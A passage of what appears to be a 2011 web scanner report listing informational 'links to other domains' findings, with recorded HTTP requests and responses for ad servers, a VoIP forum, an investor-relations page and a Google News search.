Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 00:47:13 GMT
Content-Length: 334

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b05/0/0/%2a/q;221184486;1-0;0;44107191;367-300/125;35182385/35200203/1;;~sscs=%3fhttp://blog.connectedplanetonline.com/jolt/"><img src="http://s0.2mdn.net/viewad/2577238/CP_JOLT_300.gif" border=0 alt="Penton Media - Connected Planet, Click Here!"></a>
...[SNIP]...

18.6. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /activityi;src=2333498;type=vonag670;cat=afill201;ord=8458235408179.462? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/lp/US/afflpdc/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Thu, 12 May 2011 00:50:40 GMT
Expires: Thu, 12 May 2011 00:50:40 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 682

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Start Quantcast
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-3eN-KnpwQqheA.gif?labels=_fp.event.AFFILIATE-RESIDENTIAL-DC" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

18.7. http://forum.link2voip.com/viewtopic.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.link2voip.com
Path:   /viewtopic.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /viewtopic.php?f=19&t=185 HTTP/1.1
Host: forum.link2voip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:44:43 GMT
Set-Cookie: phpbb3_82ha5_u=1; expires=Fri, 11-May-2012 00:44:43 GMT; path=/; domain=forum.link2voip.com; HttpOnly
Set-Cookie: phpbb3_82ha5_k=; expires=Fri, 11-May-2012 00:44:43 GMT; path=/; domain=forum.link2voip.com; HttpOnly
Set-Cookie: phpbb3_82ha5_sid=30cf441e48c964d411cc69972e856ae1; expires=Fri, 11-May-2012 00:44:43 GMT; path=/; domain=forum.link2voip.com; HttpOnly
Content-type: text/html; charset=UTF-8
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Length: 36649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<span class="copyright">phpBB skin developed by: <a href="http://www.phpbbhq.com/">phpBB Headquarters</a><br />Powered by <a href="http://www.phpbb.com/">phpBB</a>
...[SNIP]...

18.8. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=90&slotname=2160251714&w=728&lmt=1302640331&color_bg=FFFFFF&color_border=FFFFFF&color_link=0000FF&color_text=000000&color_url=008000&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156434&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739%2C6042837393&correlator=1305161156578&frm=0&adk=1126279905&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=3&dtd=269&xpc=T6jA0ZNAkz&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 00:45:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13874

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.dslreports.com/forum/r25728643-Nettalk-number-portability-%26hl%3Den%26client%3Dca-pub-5216754536572039%26adU%3DBestVoIP.Smart-VoIP.com%26adT%3DWhich%2BVoIP%2Bis%2Bthe%2BBest%253F%26adU%3DSmartAsk.com/CellPlanCompare%26adT%3DCell%2BPhone%2BPlans%26adU%3DTech-Support.JustAnswer.com%26adT%3DAsk%2BTech%2BSupport%2BNow%26gl%3DUS&amp;usg=AFQjCNFp5mjttW0Q6PhHxF-BTGCGfjd8Og" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.9. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 00:45:59 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 10296

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.dslreports.com/forum/r25728643-Nettalk-number-portability-%26hl%3Den%26client%3Dca-pub-5216754536572039%26adU%3DVerizon.com/SmallBusiness%26adT%3DVerizon%2BOfficial%2BSite%26adU%3DComputer.JustAnswer.com%26adT%3DAsk%2BTech%2BSupport%2BNow%26adU%3Dwww.NokiaUSA.com/Astound%26adT%3DNokia%2BAstound%2Bon%2BT-Mobile%26adU%3DBlackBerry.com/Pearl%26adT%3DBlackBerry%25C2%25AE%2BPearl%25E2%2584%25A2%2B8220%26gl%3DUS&amp;usg=AFQjCNF-5XU8Fnbt_S9qbaSHOUxsm1BwVg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...

18.10. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=90&slotname=2685156739&w=728&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156423&bpp=3&shv=r20110427&jsv=r20110427&correlator=1305161156578&frm=0&adk=3420841610&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=1&dtd=265&xpc=HEBJlUc6zt&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 00:45:58 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3137

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
<NOSCRIPT><a href="http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb,_click.rand.48992&rtbip=64.74.116.147&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKJIbMM3bHjpFaHR0cDovL3d3dy5kc2xyZXBvcnRzLmNvbS9mb3J1bS9yMjU3Mjg2NDMtTmV0dGFsay1udW1iZXItcG9ydGFiaWxpdHktQgcIoqkIEOYBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloG3WHXck_gAHDtoCeBJABx4UIoAEBqAH2igiwAQI&redirecturl2=http://ad.doubleclick.net/jump/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie4;abr=!ie5;sz=728x90;ord=48992?"><IMG SRC="http://ad.doubleclick.net/ad/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie4;abr=!ie5;sz=728x90;ord=48992?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement">
...[SNIP]...
</IFRAME><img src="http://exch.quantserve.com/pixel/p-03tSqaTFVs1ls.gif?media=ad&p=TcstxgAMWx0K7GS0gKhpdUhyjVXN6p1up4lDYQ&r=1793774979&rand=48992&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=2,_imp.optver.27,_imp.optscore.157,_imp.optdr.0&rtbip=64.74.116.147&rtbdata2=EAAaDk1ldHJvUENTX1EyLTExILgLKJIbMM3bHjpFaHR0cDovL3d3dy5kc2xyZXBvcnRzLmNvbS9mb3J1bS9yMjU3Mjg2NDMtTmV0dGFsay1udW1iZXItcG9ydGFiaWxpdHktQgcIoqkIEOYBSgcImrUGEI1ZUAFaKHlUQ19oTWt5NTlYUU1MdUh4R0x6Z01sajY0RFFiT3VBbTJNbEJmMFloG3WHXck_gAHDtoCeBJABx4UIoAEBqAH2igiwAQI" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></body>
...[SNIP]...

18.11. http://img.mediaplex.com/content/0/12688/127209/SP_IPv6_640x480_timer.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/12688/127209/SP_IPv6_640x480_timer.js

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /content/0/12688/127209/SP_IPv6_640x480_timer.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-127209-4062-0%3Fmpt%3D6977992&mpt=6977992&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/g%3B240931323%3B0-0%3B1%3B44107191%3B1412-640/480%3B42045209/42062996/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:47:59 GMT
Server: Apache
Last-Modified: Sat, 16 Apr 2011 01:07:44 GMT
ETag: "6cd3c7-f61-4a0fec92ab800"
Accept-Ranges: bytes
Content-Length: 4635
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/g;240931323;0-0;1;44107191;1412-640/480;42045209/42062996/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/12688-127209-4062-0?mpt=6977992" target="_blank"><img src="http://img-cdn.mediaplex.com/0/12688/127209/SP_IPv6_640x480_timer.jpg" width="640" height="480" border="0" alt="">
...[SNIP]...

18.12. http://investor.hickorytech.com/phoenix.zhtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investor.hickorytech.com
Path:   /phoenix.zhtml

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /phoenix.zhtml?c=79055&p=irol-irhome HTTP/1.1
Host: investor.hickorytech.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=89451010.1305158342.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sifrFetch=true; __utma=89451010.54388696.1305158342.1305158342.1305158342.1; __utmc=89451010; __utmb=89451010.9.10.1305158342

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 24164
Cache-Control: private, max-age=58
Date: Thu, 12 May 2011 00:02:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!--###PHBoeHBhZ2U+PHRpbWVTdGFtcD41LzExLzIwMTEgODowMjowMSBQTTwvdGltZV
...[SNIP]...
</title><script language="JavaScript" src="http://media.corporate-ir.net/media_files/irol/global_js/phoenix.js"></script>
...[SNIP]...
</script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"></script>
...[SNIP]...
<body><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</a> | <a href="http://www.enventis.com/">Enventis</a> | <a href="http://www.hickorytech-is.com/">Information Solutions</a>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="15" height="1" /></td>
...[SNIP]...
<a href="phoenix.zhtml?p=irol-eventDetails&c=79055&eventID=3960325" target="_self" ><img border="0" src="http://media.corporate-ir.net/media_files/priv/ccbn/webcast/microphone2.gif" alt="Webcast Image"/></a>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="4" /></td>
...[SNIP]...
<td nowrap="nowrap">&#160;<img src="http://media.corporate-ir.net/media_files/IROL/global_images/arrow_downRed.gif" alt="Stock is Down" width="9" height="9" hspace="2" />&#160;<span class="ccbnNeg">
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="1" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="15" height="1" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<p class="ccbnTtl"><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9OTE3MTN8Q2hpbGRJRD0tMXxUeXBlPTM=&amp;t=1" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/79/79055/2010cover_104.png" target="_blank" border="0" /></a>
...[SNIP]...
<p class="ccbnTtl"><a href="http://phx.corporate-ir.net/External.File?item=UGFyZW50SUQ9ODg4MjB8Q2hpbGRJRD0tMXxUeXBlPTM=&amp;t=1" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/79/79055/Apr2011InvestorUpdate.png" target="_blank" border="0" /></a>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<td><img src="http://media.corporate-ir.net/media_files/irol/global_images/spacer.gif" width="1" height="10" /></td>
...[SNIP]...
<span class="ccbnDisclaimer"><img src="http://media.corporate-ir.net/media_files/priv/ccbn/powered_edgar_online.gif" border="0" height="27" width="125" /><br/>
...[SNIP]...
<a Class="ccbnLnk"Target="_blank" href="phoenix.zhtml?c=79055&p=irol-irhome_pf"><img src="http://media.corporate-ir.net/media_files/IROL/global_images/toolkit_print_t.gif" alt="Print Page" border="0" align="middle" /></a>
...[SNIP]...
ludmVzdG9yLmhpY2tvcnl0ZWNoLmNvbS9waG9lbml4LnpodG1sP2M9NzkwNTUmcD1pcm9sLWlyaG9tZQ%3d%3d" onclick="window.open(this.href,'','scrollbars=no,status=no,width=450,height=500');return false;" target="_blank"><img src="http://media.corporate-ir.net/media_files/IROL/global_images/toolkit_emailPg_t.gif" alt="E-mail Page" border="0" align="middle" /></a>
...[SNIP]...
<A HREF="phoenix.zhtml?c=79055&p=rssSubscription&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_rss_t.gif" border="0" alt="RSS Feeds" align="middle" /></A>
...[SNIP]...
<A HREF="phoenix.zhtml?c=79055&p=irol-alerts&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_alert_t.gif" border="0" alt="E-mail Alerts" /></A>
...[SNIP]...
<A HREF="phoenix.zhtml?c=79055&p=irol-contact&t=&id=&" NAME=""Class="ccbnLnk"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_contact_t.gif" border="0" alt="IR Contacts" align="middle" /></A>
...[SNIP]...
<a Class="ccbnLnk"Target="_blank" href="Tearsheet.ashx?c=79055"><img src="http://media.corporate-ir.net/media_files/irol/global_images/toolkit_tearSht_t.gif" border="0" alt="Financial Tear Sheet" align="middle" /></a>
...[SNIP]...

18.13. http://news.google.com/news/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /news/search?q=xss&hl=en&biw=925&bih=964&bav=on.2,or.r_gc.r_pw.&um=1&cf=i&sa=X&ei=FzrLTcjXN4P40gHo6qDoCA&ved=0CAoQpwUoAQ HTTP/1.1
Host: news.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=scanmedios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 01:38:59 GMT
Expires: Thu, 12 May 2011 01:38:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 76999

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=i&amp;ned=us&amp;hl=en&amp;q=xss&amp;cf=i&amp;output=rss">
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=xss&hl=en&tab=n1">YouTube</a>
...[SNIP]...
